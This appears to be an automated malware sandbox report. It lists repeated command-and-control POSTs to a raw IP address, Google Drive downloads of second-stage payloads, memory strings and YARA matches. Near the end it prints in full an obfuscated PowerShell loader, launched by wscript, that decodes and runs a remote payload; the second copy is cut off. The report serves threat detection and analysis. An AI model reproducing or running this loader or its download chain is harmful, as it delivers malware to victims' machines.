Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRu&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 180Connection: close

Source: dxdiag.exe, 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://137.184.191.215/index.php/10899
Source: powershell.exe, 00000004.00000002.3052757147.00000000076E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B22A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2221990774.000001F3C0564000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.3034052214.0000000004D48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B04F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3034052214.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.3034052214.0000000004D48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B04F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.3034052214.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B21BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googPz
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B092B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B21BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: dxdiag.exe, 00000014.00000002.3335131309.0000000005FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: dxdiag.exe, 00000014.00000002.3346265000.0000000021150000.00000004.00001000.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.0000000005FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f
Source: dxdiag.exe, 00000014.00000002.3335131309.0000000005FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_fd
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B0717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRuP
Source: powershell.exe, 00000004.00000002.3034052214.0000000004D48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRuXR
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googhh
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B0985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: dxdiag.exe, 00000014.00000003.2502961675.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2476461410.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.0000000005FC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: dxdiag.exe, 00000014.00000002.3335131309.0000000006024000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/S
Source: dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.000000000600A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download
Source: dxdiag.exe, 00000014.00000002.3335131309.000000000600A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download2
Source: dxdiag.exe, 00000014.00000002.3335131309.000000000600A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=downloadd
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B0985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRu&export=download
Source: dxdiag.exe, 00000014.00000003.2502961675.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2476461410.000000000603C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/earc%(
Source: dxdiag.exe, 00000014.00000003.2502961675.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2476461410.000000000603C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/s.cn
Source: powershell.exe, 00000004.00000002.3034052214.0000000004D48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B10CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2221990774.000001F3C0564000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: dxdiag.exe, 00000014.00000002.3335131309.0000000005FC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wordpress.org/documentation/article/faq-troubleshooting/
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65312 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65312
Source: unknown	Network traffic detected: HTTP traffic on port 65310 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65310
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown	HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.5:65310 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:65312 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_1292.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7156, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr 